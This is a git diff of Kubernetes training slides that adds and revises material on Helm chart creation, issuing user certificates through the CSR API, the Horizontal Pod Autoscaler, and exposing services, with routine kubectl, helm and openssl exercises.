- These resources are organized by type, or `Kind` (in the API)
|
||||
- The Kubernetes API is (mostly) RESTful
|
||||
|
||||
- It allows us to create, read, update, delete *resources*
|
||||
|
||||
- A few common resource types are:
|
||||
|
||||
- node (a machine — physical or virtual — in our cluster)
|
||||
|
||||
- pod (group of containers running together on a node)
|
||||
|
||||
- service (stable network endpoint to connect to one or multiple containers)
|
||||
- namespace (more-or-less isolated group of things)
|
||||
- secret (bundle of sensitive data to be passed to a container)
|
||||
|
||||
And much more!
|
||||
|
||||
- We can see the full list by running `kubectl api-resources`
|
||||
|
||||
(In Kubernetes 1.10 and prior, the command to list API resources was `kubectl get`)
|
||||
|
||||
---
|
||||
|
||||
@@ -253,22 +265,16 @@ class: pic
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
## Credits
|
||||
|
||||
- The first diagram is courtesy of Weave Works
|
||||
- The first diagram is courtesy of Lucas Käldström, in [this presentation](https://speakerdeck.com/luxas/kubeadm-cluster-creation-internals-from-self-hosting-to-upgradability-and-ha)
|
||||
|
||||
- it's one of the best Kubernetes architecture diagrams available!
|
||||
|
||||
- The second diagram is courtesy of Weave Works
|
||||
|
||||
- a *pod* can have multiple containers working together
|
||||
|
||||
- IP addresses are associated with *pods*, not with individual containers
|
||||
|
||||
- The second diagram is courtesy of Lucas Käldström, in [this presentation](https://speakerdeck.com/luxas/kubeadm-cluster-creation-internals-from-self-hosting-to-upgradability-and-ha)
|
||||
|
||||
- it's one of the best Kubernetes architecture diagrams available!
|
||||
|
||||
Both diagrams used with permission.
|
||||
|
||||
114
slides/k8s/create-chart.md
Normal file
@@ -0,0 +1,114 @@
|
||||
## Creating a chart
|
||||
|
||||
- We are going to show a way to create a *very simplified* chart
|
||||
|
||||
- In a real chart, *lots of things* would be templatized
|
||||
|
||||
(Resource names, service types, number of replicas...)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a sample chart:
|
||||
```bash
|
||||
helm create dockercoins
|
||||
```
|
||||
|
||||
- Move away the sample templates and create an empty template directory:
|
||||
```bash
|
||||
mv dockercoins/templates dockercoins/default-templates
|
||||
mkdir dockercoins/templates
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Exporting the YAML for our application
|
||||
|
||||
- The following section assumes that DockerCoins is currently running
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create one YAML file for each resource that we need:
|
||||
.small[
|
||||
```bash
|
||||
|
||||
while read kind name; do
|
||||
kubectl get -o yaml --export $kind $name > dockercoins/templates/$name-$kind.yaml
|
||||
done <<EOF
|
||||
deployment worker
|
||||
deployment hasher
|
||||
daemonset rng
|
||||
deployment webui
|
||||
deployment redis
|
||||
service hasher
|
||||
service rng
|
||||
service webui
|
||||
service redis
|
||||
EOF
|
||||
```
|
||||
]
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Testing our helm chart
|
||||
|
||||
.exercise[
|
||||
|
||||
- Let's install our helm chart! (`dockercoins` is the path to the chart)
|
||||
```
|
||||
helm install dockercoins
|
||||
```
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
- Since the application is already deployed, this will fail:<br>
|
||||
`Error: release loitering-otter failed: services "hasher" already exists`
|
||||
|
||||
- To avoid naming conflicts, we will deploy the application in another *namespace*
|
||||
|
||||
---
|
||||
|
||||
## Switching to another namespace
|
||||
|
||||
- We can create a new namespace and switch to it
|
||||
|
||||
(Helm will automatically use the namespace specified in our context)
|
||||
|
||||
- We can also tell Helm which namespace to use
|
||||
|
||||
.exercise[
|
||||
|
||||
- Tell Helm to use a specific namespace:
|
||||
```bash
|
||||
helm install dockercoins --namespace=magenta
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Checking our new copy of DockerCoins
|
||||
|
||||
- We can check the worker logs, or the web UI
|
||||
|
||||
.exercise[
|
||||
|
||||
- Retrieve the NodePort number of the web UI:
|
||||
```bash
|
||||
kubectl get service webui --namespace=magenta
|
||||
```
|
||||
|
||||
- Open it in a web browser
|
||||
|
||||
- Look at the worker logs:
|
||||
```bash
|
||||
kubectl logs deploy/worker --tail=10 --follow --namespace=magenta
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Note: it might take a minute or two for the worker to start.
|
||||
426
slides/k8s/csr-api.md
Normal file
@@ -0,0 +1,426 @@
|
||||
# The CSR API
|
||||
|
||||
- The Kubernetes API exposes CSR resources
|
||||
|
||||
- We can use these resources to issue TLS certificates
|
||||
|
||||
- First, we will go through a quick reminder about TLS certificates
|
||||
|
||||
- Then, we will see how to obtain a certificate for a user
|
||||
|
||||
- We will use that certificate to authenticate with the cluster
|
||||
|
||||
- Finally, we will grant some privileges to that user
|
||||
|
||||
---
|
||||
|
||||
## Reminder about TLS
|
||||
|
||||
- TLS (Transport Layer Security) is a protocol providing:
|
||||
|
||||
- encryption (to prevent eavesdropping)
|
||||
|
||||
- authentication (using public key cryptography)
|
||||
|
||||
- When we access an https:// URL, the server authenticates itself
|
||||
|
||||
(it proves its identity to us; as if it were "showing its ID")
|
||||
|
||||
- But we can also have mutual TLS authentication (mTLS)
|
||||
|
||||
(client proves its identity to server; server proves its identity to client)
|
||||
|
||||
---
|
||||
|
||||
## Authentication with certificates
|
||||
|
||||
- To authenticate, someone (client or server) needs:
|
||||
|
||||
- a *private key* (that remains known only to them)
|
||||
|
||||
- a *public key* (that they can distribute)
|
||||
|
||||
- a *certificate* (associating the public key with an identity)
|
||||
|
||||
- A message encrypted with the private key can only be decrypted with the public key
|
||||
|
||||
(and vice versa)
|
||||
|
||||
- If I use someone's public key to encrypt / decrypt their messages,
|
||||
<br/>
|
||||
I can be certain that I am talking to them / they are talking to me
|
||||
|
||||
- The certificate proves that I have the correct public key for them
|
||||
|
||||
---
|
||||
|
||||
## Certificate generation workflow
|
||||
|
||||
This is what I do if I want to obtain a certificate.
|
||||
|
||||
1. Create public and private key.
|
||||
|
||||
2. Create a Certificate Signing Request (CSR).
|
||||
|
||||
(The CSR contains the identity that I claim and an expiration date.)
|
||||
|
||||
3. Send that CSR to the Certificate Authority (CA).
|
||||
|
||||
4. The CA verifies that I can claim the identity in the CSR.
|
||||
|
||||
5. The CA generates my certificate and gives it to me.
|
||||
|
||||
The CA (or anyone else) never needs to know my private key.
|
||||
|
||||
---
|
||||
|
||||
## The CSR API
|
||||
|
||||
- The Kubernetes API has a CertificateSigningRequest resource type
|
||||
|
||||
(we can list them with e.g. `kubectl get csr`)
|
||||
|
||||
- We can create a CSR object
|
||||
|
||||
(= upload a CSR to the Kubernetes API)
|
||||
|
||||
- Then, using the Kubernetes API, we can approve / deny the request
|
||||
|
||||
- If we approve the request, the Kubernetes API generates a certificate
|
||||
|
||||
- The certificate gets attached to the CSR object and can be retrieved
|
||||
|
||||
---
|
||||
|
||||
## Using the CSR API
|
||||
|
||||
- We will show how to use the CSR API to obtain user certificates
|
||||
|
||||
- This will be a rather complex demo
|
||||
|
||||
- ... And yet, we will take a few shortcuts to simplify it
|
||||
|
||||
(but it will illustrate the general idea)
|
||||
|
||||
- The demo also won't be automated
|
||||
|
||||
(we would have to write extra code to make it fully functional)
|
||||
|
||||
---
|
||||
|
||||
## General idea
|
||||
|
||||
- We will create a Namespace named "users"
|
||||
|
||||
- Each user will get a ServiceAccount in that Namespace
|
||||
|
||||
- That ServiceAccount will give read/write access to *one* CSR object
|
||||
|
||||
- Users will use that ServiceAccount's token to submit a CSR
|
||||
|
||||
- We will approve the CSR (or not)
|
||||
|
||||
- Users can then retrieve their certificate from their CSR object
|
||||
|
||||
- ... And use that certificate for subsequent interactions
|
||||
|
||||
---
|
||||
|
||||
## Resource naming
|
||||
|
||||
For a user named `jean.doe`, we will have:
|
||||
|
||||
- ServiceAccount `jean.doe` in Namespace `users`
|
||||
|
||||
- CertificateSigningRequest `users:jean.doe`
|
||||
|
||||
- ClusterRole `users:jean.doe` giving read/write access to that CSR
|
||||
|
||||
- ClusterRoleBinding `users:jean.doe` binding ClusterRole and ServiceAccount
|
||||
|
||||
---
|
||||
|
||||
## Creating the user's resources
|
||||
|
||||
.warning[If you want to use another name than `jean.doe`, update the YAML file!]
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the global namespace for all users:
|
||||
```bash
|
||||
kubectl create namespace users
|
||||
```
|
||||
|
||||
- Create the ServiceAccount, ClusterRole, ClusterRoleBinding for `jean.doe`:
|
||||
```bash
|
||||
kubectl apply -f ~/container.training/k8s/users:jean.doe.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Extracting the user's token
|
||||
|
||||
- Let's obtain the user's token and give it to them
|
||||
|
||||
(the token will be their password)
|
||||
|
||||
.exercise[
|
||||
|
||||
- List the user's secrets:
|
||||
```bash
|
||||
kubectl --namespace=users describe serviceaccount jean.doe
|
||||
```
|
||||
|
||||
- Show the user's token:
|
||||
```bash
|
||||
kubectl --namespace=users describe secret `jean.doe-token-xxxxx`
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Configure `kubectl` to use the token
|
||||
|
||||
- Let's create a new context that will use that token to access the API
|
||||
|
||||
.exercise[
|
||||
|
||||
- Add a new identity to our kubeconfig file:
|
||||
```bash
|
||||
kubectl config set-credentials token:jean.doe --token=...
|
||||
```
|
||||
|
||||
- Add a new context using that identity:
|
||||
```bash
|
||||
kubectl config set-context jean.doe --user=token:jean.doe --cluster=kubernetes
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Access the API with the token
|
||||
|
||||
- Let's check that our access rights are set properly
|
||||
|
||||
.exercise[
|
||||
|
||||
- Try to access any resource:
|
||||
```bash
|
||||
kubectl get pods
|
||||
```
|
||||
(This should tell us "Forbidden")
|
||||
|
||||
- Try to access "our" CertificateSigningRequest:
|
||||
```bash
|
||||
kubectl get csr users:jean.doe
|
||||
```
|
||||
(This should tell us "NotFound")
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Create a key and a CSR
|
||||
|
||||
- There are many tools to generate TLS keys and CSRs
|
||||
|
||||
- Let's use OpenSSL; it's not the best one, but it's installed everywhere
|
||||
|
||||
(many people prefer cfssl, easyrsa, or other tools; that's fine too!)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Generate the key and certificate signing request:
|
||||
```bash
|
||||
openssl req -newkey rsa:2048 -nodes -keyout key.pem \
|
||||
-new -subj /CN=jean.doe/O=devs/ -out csr.pem
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The command above generates:
|
||||
|
||||
- a 2048-bit RSA key, without DES encryption, stored in key.pem
|
||||
- a CSR for the name `jean.doe` in group `devs`
|
||||
|
||||
---
|
||||
|
||||
## Inside the Kubernetes CSR object
|
||||
|
||||
- The Kubernetes CSR object is a thin wrapper around the CSR PEM file
|
||||
|
||||
- The PEM file needs to be encoded to base64 on a single line
|
||||
|
||||
(we will use `base64 -w0` for that purpose)
|
||||
|
||||
- The Kubernetes CSR object also needs to list the right "usages"
|
||||
|
||||
(these are flags indicating how the certificate can be used)
|
||||
|
||||
---
|
||||
|
||||
## Sending the CSR to Kubernetes
|
||||
|
||||
.exercise[
|
||||
|
||||
- Generate and create the CSR resource:
|
||||
```bash
|
||||
kubectl apply -f - <<EOF
|
||||
apiVersion: certificates.k8s.io/v1beta1
|
||||
kind: CertificateSigningRequest
|
||||
metadata:
|
||||
name: users:jean.doe
|
||||
spec:
|
||||
request: $(base64 -w0 < csr.pem)
|
||||
usages:
|
||||
- digital signature
|
||||
- key encipherment
|
||||
- client auth
|
||||
EOF
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Adjusting certificate expiration
|
||||
|
||||
- By default, the CSR API generates certificates valid 1 year
|
||||
|
||||
- We want to generate short-lived certificates, so we will lower that to 1 hour
|
||||
|
||||
- Fow now, this is configured [through an experimental controller manager flag](https://github.com/kubernetes/kubernetes/issues/67324)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit the static pod definition for the controller manager:
|
||||
```bash
|
||||
sudo vim /etc/kubernetes/manifests/kube-controller-manager.yaml
|
||||
```
|
||||
|
||||
- In the list of flags, add the following line:
|
||||
```bash
|
||||
- --experimental-cluster-signing-duration=1h
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Verifying and approving the CSR
|
||||
|
||||
- Let's inspect the CSR, and if it is valid, approve it
|
||||
|
||||
.exercise[
|
||||
|
||||
- Switch back to `cluster-admin`:
|
||||
```bash
|
||||
kctx -
|
||||
```
|
||||
|
||||
- Inspect the CSR:
|
||||
```bash
|
||||
kubectl describe csr users:jean.doe
|
||||
```
|
||||
|
||||
- Approve it:
|
||||
```bash
|
||||
kubectl certificate approve users:jean.doe
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Obtaining the certificate
|
||||
|
||||
.exercise[
|
||||
|
||||
- Switch back to the user's identity:
|
||||
```bash
|
||||
kctx -
|
||||
```
|
||||
|
||||
- Retrieve the certificate from the CSR:
|
||||
```bash
|
||||
kubectl get csr users:jean.doe \
|
||||
-o jsonpath={.status.certificate} \
|
||||
| base64 -d > cert.pem
|
||||
```
|
||||
|
||||
- Inspect the certificate:
|
||||
```bash
|
||||
openssl x509 -in cert.pem -text -noout
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Using the certificate
|
||||
|
||||
.exercise[
|
||||
|
||||
- Add the key and certificate to kubeconfig:
|
||||
```bash
|
||||
kubectl config set-credentials cert:jean.doe --embed-certs \
|
||||
--client-certificate=cert.pem --client-key=key.pem
|
||||
```
|
||||
|
||||
- Update the user's context to use the key and cert to authenticate:
|
||||
```bash
|
||||
kubectl config set-context jean.doe --user cert:jean.doe
|
||||
```
|
||||
|
||||
- Confirm that we are seen as `jean.doe` (but don't have permissions):
|
||||
```bash
|
||||
kubectl get pods
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## What's missing?
|
||||
|
||||
We shown, step by step, a method to issue short-lived certificates for users.
|
||||
|
||||
To be usable in real environments, we would need to add:
|
||||
|
||||
- a kubectl helper to automatically generate the CSR and obtain the cert
|
||||
|
||||
(and transparently renew the cert when needed)
|
||||
|
||||
- a Kubernetes controller to automatically validate and approve CSRs
|
||||
|
||||
(checking that the subject and groups are valid)
|
||||
|
||||
- a way for the users to know the groups to add to their CSR
|
||||
|
||||
(e.g.: annotations on their ServiceAccount + read access to the ServiceAccount)
|
||||
|
||||
---
|
||||
|
||||
## Is this realistic?
|
||||
|
||||
- Larger organizations typically integrate with their own directory
|
||||
|
||||
- The general principle, however, is the same:
|
||||
|
||||
- users have long-term credentials (password, token, ...)
|
||||
|
||||
- they use these credentials to obtain other, short-lived credentials
|
||||
|
||||
- This provides enhanced security:
|
||||
|
||||
- the long-term credentials can use long passphrases, 2FA, HSM ...
|
||||
|
||||
- the short-term credentials are more convenient to use
|
||||
|
||||
- we get strong security *and* convenience
|
||||
|
||||
- Systems like Vault also have certificate issuance mechanisms
|
||||
@@ -73,18 +73,13 @@
|
||||
|
||||
- Dump the `rng` resource in YAML:
|
||||
```bash
|
||||
kubectl get deploy/rng -o yaml --export >rng.yml
|
||||
kubectl get deploy/rng -o yaml >rng.yml
|
||||
```
|
||||
|
||||
- Edit `rng.yml`
|
||||
|
||||
]
|
||||
|
||||
Note: `--export` will remove "cluster-specific" information, i.e.:
|
||||
- namespace (so that the resource is not tied to a specific namespace)
|
||||
- status and creation timestamp (useless when creating a new resource)
|
||||
- resourceVersion and uid (these would cause... *interesting* problems)
|
||||
|
||||
---
|
||||
|
||||
## "Casting" a resource to another
|
||||
|
||||
@@ -1,6 +1,20 @@
|
||||
## Declarative vs imperative in Kubernetes
|
||||
|
||||
- Virtually everything we create in Kubernetes is created from a *spec*
|
||||
- With Kubernetes, we cannot say: "run this container"
|
||||
|
||||
- All we can do is write a *spec* and push it to the API server
|
||||
|
||||
(by creating a resource like e.g. a Pod or a Deployment)
|
||||
|
||||
- The API server will validate that spec (and reject it if it's invalid)
|
||||
|
||||
- Then it will store it in etcd
|
||||
|
||||
- A *controller* will "notice" that spec and act upon it
|
||||
|
||||
---
|
||||
|
||||
## Reconciling state
|
||||
|
||||
- Watch for the `spec` fields in the YAML files later!
|
||||
|
||||
|
||||
67
slides/k8s/deploymentslideshow.md
Normal file
@@ -0,0 +1,67 @@
|
||||
## 19,000 words
|
||||
|
||||
They say, "a picture is worth one thousand words."
|
||||
|
||||
The following 19 slides show what really happens when we run:
|
||||
|
||||
```bash
|
||||
kubectl run web --image=nginx --replicas=3
|
||||
```
|
||||
|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
---
|
||||
class: pic
|
||||

|
||||
@@ -61,7 +61,7 @@ There are many possibilities!
|
||||
|
||||
- creates a new custom type, `Remote`, exposing a git+ssh server
|
||||
|
||||
- deploy by pushing YAML or Helm Charts to that remote
|
||||
- deploy by pushing YAML or Helm charts to that remote
|
||||
|
||||
- Replacing built-in types with CRDs
|
||||
|
||||
@@ -87,7 +87,11 @@ There are many possibilities!
|
||||
|
||||
(and take action when they are created/updated)
|
||||
|
||||
*Example: [YAML to install the gitkube CRD](https://storage.googleapis.com/gitkube/gitkube-setup-stable.yaml)*
|
||||
*
|
||||
Examples:
|
||||
[YAML to install the gitkube CRD](https://storage.googleapis.com/gitkube/gitkube-setup-stable.yaml),
|
||||
[YAML to install a redis operator CRD](https://github.com/amaizfinance/redis-operator/blob/master/deploy/crds/k8s_v1alpha1_redis_crd.yaml)
|
||||
*
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -234,6 +234,6 @@
|
||||
|
||||
(see the [documentation](https://github.com/hasura/gitkube/blob/master/docs/remote.md) for more details)
|
||||
|
||||
- Gitkube can also deploy Helm Charts
|
||||
- Gitkube can also deploy Helm charts
|
||||
|
||||
(instead of raw YAML files)
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
# Healthchecks
|
||||
# Healthchecks (extra material)
|
||||
|
||||
- Kubernetes provides two kinds of healthchecks: liveness and readiness
|
||||
|
||||
|
||||
@@ -176,77 +176,3 @@ The chart's metadata includes an URL to the project's home page.
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Creating a chart
|
||||
|
||||
- We are going to show a way to create a *very simplified* chart
|
||||
|
||||
- In a real chart, *lots of things* would be templatized
|
||||
|
||||
(Resource names, service types, number of replicas...)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a sample chart:
|
||||
```bash
|
||||
helm create dockercoins
|
||||
```
|
||||
|
||||
- Move away the sample templates and create an empty template directory:
|
||||
```bash
|
||||
mv dockercoins/templates dockercoins/default-templates
|
||||
mkdir dockercoins/templates
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Exporting the YAML for our application
|
||||
|
||||
- The following section assumes that DockerCoins is currently running
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create one YAML file for each resource that we need:
|
||||
.small[
|
||||
```bash
|
||||
|
||||
while read kind name; do
|
||||
kubectl get -o yaml --export $kind $name > dockercoins/templates/$name-$kind.yaml
|
||||
done <<EOF
|
||||
deployment worker
|
||||
deployment hasher
|
||||
daemonset rng
|
||||
deployment webui
|
||||
deployment redis
|
||||
service hasher
|
||||
service rng
|
||||
service webui
|
||||
service redis
|
||||
EOF
|
||||
```
|
||||
]
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Testing our helm chart
|
||||
|
||||
.exercise[
|
||||
|
||||
- Let's install our helm chart! (`dockercoins` is the path to the chart)
|
||||
```
|
||||
helm install dockercoins
|
||||
```
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
- Since the application is already deployed, this will fail:<br>
|
||||
`Error: release loitering-otter failed: services "hasher" already exists`
|
||||
|
||||
- To avoid naming conflicts, we will deploy the application in another *namespace*
|
||||
|
||||
245
slides/k8s/horizontal-pod-autoscaler.md
Normal file
@@ -0,0 +1,245 @@
|
||||
# The Horizontal Pod Autoscaler
|
||||
|
||||
- What is the Horizontal Pod Autoscaler, or HPA?
|
||||
|
||||
- It is a controller that can perform *horizontal* scaling automatically
|
||||
|
||||
- Horizontal scaling = changing the number of replicas
|
||||
|
||||
(adding / removing pods)
|
||||
|
||||
- Vertical scaling = changing the size of individual replicas
|
||||
|
||||
(increasing / reducing CPU and RAM per pod)
|
||||
|
||||
- Cluster scaling = changing the size of the cluster
|
||||
|
||||
(adding / removing nodes)
|
||||
|
||||
---
|
||||
|
||||
## Principle of operation
|
||||
|
||||
- Each HPA resource (or "policy") specifies:
|
||||
|
||||
- which object to monitor and scale (e.g. a Deployment, ReplicaSet...)
|
||||
|
||||
- min/max scaling ranges (the max is a safety limit!)
|
||||
|
||||
- a target resource usage (e.g. the default is CPU=80%)
|
||||
|
||||
- The HPA continuously monitors the CPU usage for the related object
|
||||
|
||||
- It computes how many pods should be running:
|
||||
|
||||
`TargetNumOfPods = ceil(sum(CurrentPodsCPUUtilization) / Target)`
|
||||
|
||||
- It scales up/down the related object to this target number of pods
|
||||
|
||||
---
|
||||
|
||||
## Pre-requirements
|
||||
|
||||
- The metrics server needs to be running
|
||||
|
||||
(i.e. we need to be able to see pod metrics with `kubectl top pods`)
|
||||
|
||||
- The pods that we want to autoscale need to have resource requests
|
||||
|
||||
(because the target CPU% is not absolute, but relative to the request)
|
||||
|
||||
- The latter actually makes a lot of sense:
|
||||
|
||||
- if a Pod doesn't have a CPU request, it might be using 10% of CPU ...
|
||||
|
||||
- ... but only because there is no CPU time available!
|
||||
|
||||
- this makes sure that we won't add pods to nodes that are already resource-starved
|
||||
|
||||
---
|
||||
|
||||
## Testing the HPA
|
||||
|
||||
- We will start a CPU-intensive web service
|
||||
|
||||
- We will send some traffic to that service
|
||||
|
||||
- We will create an HPA policy
|
||||
|
||||
- The HPA will automatically scale up the service for us
|
||||
|
||||
---
|
||||
|
||||
## A CPU-intensive web service
|
||||
|
||||
- Let's use `jpetazzo/busyhttp`
|
||||
|
||||
(it is a web server that will use 1s of CPU for each HTTP request)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Deploy the web server:
|
||||
```bash
|
||||
kubectl create deployment busyhttp --image=jpetazzo/busyhttp
|
||||
```
|
||||
|
||||
- Expose it with a ClusterIP service:
|
||||
```bash
|
||||
kubectl expose deployment busyhttp --port=80
|
||||
```
|
||||
|
||||
- Get the ClusterIP allocated to the service:
|
||||
```bash
|
||||
kubectl get svc busyhttp
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Monitor what's going on
|
||||
|
||||
- Let's start a bunch of commands to watch what is happening
|
||||
|
||||
.exercise[
|
||||
|
||||
- Monitor pod CPU usage:
|
||||
```bash
|
||||
watch kubectl top pods
|
||||
```
|
||||
|
||||
- Monitor service latency:
|
||||
```bash
|
||||
httping http://`ClusterIP`/
|
||||
```
|
||||
|
||||
- Monitor cluster events:
|
||||
```bash
|
||||
kubectl get events -w
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Send traffic to the service
|
||||
|
||||
- We will use `ab` (Apache Bench) to send traffic
|
||||
|
||||
.exercise[
|
||||
|
||||
- Send a lot of requests to the service, with a concurrency level of 3:
|
||||
```bash
|
||||
ab -c 3 -n 100000 http://`ClusterIP`/
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The latency (reported by `httping`) should increase above 3s.
|
||||
|
||||
The CPU utilization should increase to 100%.
|
||||
|
||||
(The server is single-threaded and won't go above 100%.)
|
||||
|
||||
---
|
||||
|
||||
## Create an HPA policy
|
||||
|
||||
- There is a helper command to do that for us: `kubectl autoscale`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the HPA policy for the `busyhttp` deployment:
|
||||
```bash
|
||||
kubectl autoscale deployment busyhttp --max=10
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
By default, it will assume a target of 80% CPU usage.
|
||||
|
||||
This can also be set with `--cpu-percent=`.
|
||||
|
||||
--
|
||||
|
||||
*The autoscaler doesn't seem to work. Why?*
|
||||
|
||||
---
|
||||
|
||||
## What did we miss?
|
||||
|
||||
- The events stream gives us a hint, but to be honest, it's not very clear:
|
||||
|
||||
`missing request for cpu`
|
||||
|
||||
- We forgot to specify a resource request for our Deployment!
|
||||
|
||||
- The HPA target is not an absolute CPU%
|
||||
|
||||
- It is relative to the CPU requested by the pod
|
||||
|
||||
---
|
||||
|
||||
## Adding a CPU request
|
||||
|
||||
- Let's edit the deployment and add a CPU request
|
||||
|
||||
- Since our server can use up to 1 core, let's request 1 core
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit the Deployment definition:
|
||||
```bash
|
||||
kubectl edit deployment busyhttp
|
||||
```
|
||||
|
||||
- In the `containers` list, add the following block:
|
||||
```yaml
|
||||
resources:
|
||||
requests:
|
||||
cpu: "1"
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Results
|
||||
|
||||
- After saving and quitting, a rolling update happens
|
||||
|
||||
(if `ab` or `httping` exits, make sure to restart it)
|
||||
|
||||
- It will take a minute or two for the HPA to kick in:
|
||||
|
||||
- the HPA runs every 30 seconds by default
|
||||
|
||||
- it needs to gather metrics from the metrics server first
|
||||
|
||||
- If we scale further up (or down), the HPA will react after a few minutes:
|
||||
|
||||
- it won't scale up if it already scaled in the last 3 minutes
|
||||
|
||||
- it won't scale down if it already scaled in the last 5 minutes
|
||||
|
||||
---
|
||||
|
||||
## What about other metrics?
|
||||
|
||||
- The HPA in API group `autoscaling/v1` only supports CPU scaling
|
||||
|
||||
- The HPA in API group `autoscaling/v2beta2` supports metrics from various API groups:
|
||||
|
||||
- metrics.k8s.io, aka metrics server (per-Pod CPU and RAM)
|
||||
|
||||
- custom.metrics.k8s.io, custom metrics per Pod
|
||||
|
||||
- external.metrics.k8s.io, external metrics (not associated to Pods)
|
||||
|
||||
- Kubernetes doesn't implement any of these API groups
|
||||
|
||||
- Using these metrics requires to [register additional APIs](https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/#support-for-metrics-apis)
|
||||
|
||||
- The metrics provided by metrics server are standard; everything else is custom
|
||||
|
||||
- For more details, see [this great blog post](https://medium.com/uptime-99/kubernetes-hpa-autoscaling-with-custom-and-external-metrics-da7f41ff7846) or [this talk](https://www.youtube.com/watch?v=gSiGFH4ZnS8)
|
||||
@@ -276,3 +276,21 @@ error: the server doesn't have a resource type "endpoint"
|
||||
- There is no `endpoint` object: `type Endpoints struct`
|
||||
|
||||
- The type doesn't represent a single endpoint, but a list of endpoints
|
||||
|
||||
---
|
||||
|
||||
## Exposing services to the outside world
|
||||
|
||||
- The default type (ClusterIP) only works for internal traffic
|
||||
|
||||
- If we want to accept external traffic, we can use one of these:
|
||||
|
||||
- NodePort (expose a service on a TCP port between 30000-32768)
|
||||
|
||||
- LoadBalancer (provision a cloud load balancer for our service)
|
||||
|
||||
- ExternalIP (use one node's external IP address)
|
||||
|
||||
- Ingress (a special mechanism for HTTP services)
|
||||
|
||||
*We'll see NodePorts and Ingresses more in detail later.*
|
||||
|
||||
@@ -79,6 +79,8 @@
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Exploring types and definitions
|
||||
|
||||
- We can list all available resource types by running `kubectl api-resources`
|
||||
@@ -102,9 +104,11 @@
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Introspection vs. documentation
|
||||
|
||||
- We can access the same information by reading the [API documentation](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.14/)
|
||||
- We can access the same information by reading the [API documentation](https://kubernetes.io/docs/reference/#api-reference)
|
||||
|
||||
- The API documentation is usually easier to read, but:
|
||||
|
||||
|
||||
@@ -320,6 +320,8 @@ We could! But the *deployment* would notice it right away, and scale back to the
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
### Streaming logs of many pods
|
||||
|
||||
- Let's see what happens if we try to stream the logs for more than 5 pods
|
||||
@@ -347,6 +349,8 @@ use --max-log-requests to increase the limit
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Why can't we stream the logs of many pods?
|
||||
|
||||
- `kubectl` opens one connection to the API server per pod
|
||||
|
||||
@@ -16,6 +16,8 @@
|
||||
|
||||
- each pod is aware of its IP address (no NAT)
|
||||
|
||||
- pod IP addresses are assigned by the network implementation
|
||||
|
||||
- Kubernetes doesn't mandate any particular implementation
|
||||
|
||||
---
|
||||
@@ -30,7 +32,7 @@
|
||||
|
||||
- No new protocol
|
||||
|
||||
- Pods cannot move from a node to another and keep their IP address
|
||||
- The network implementation can decide how to allocate addresses
|
||||
|
||||
- IP addresses don't have to be "portable" from a node to another
|
||||
|
||||
@@ -82,13 +84,17 @@
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## The Container Network Interface (CNI)
|
||||
|
||||
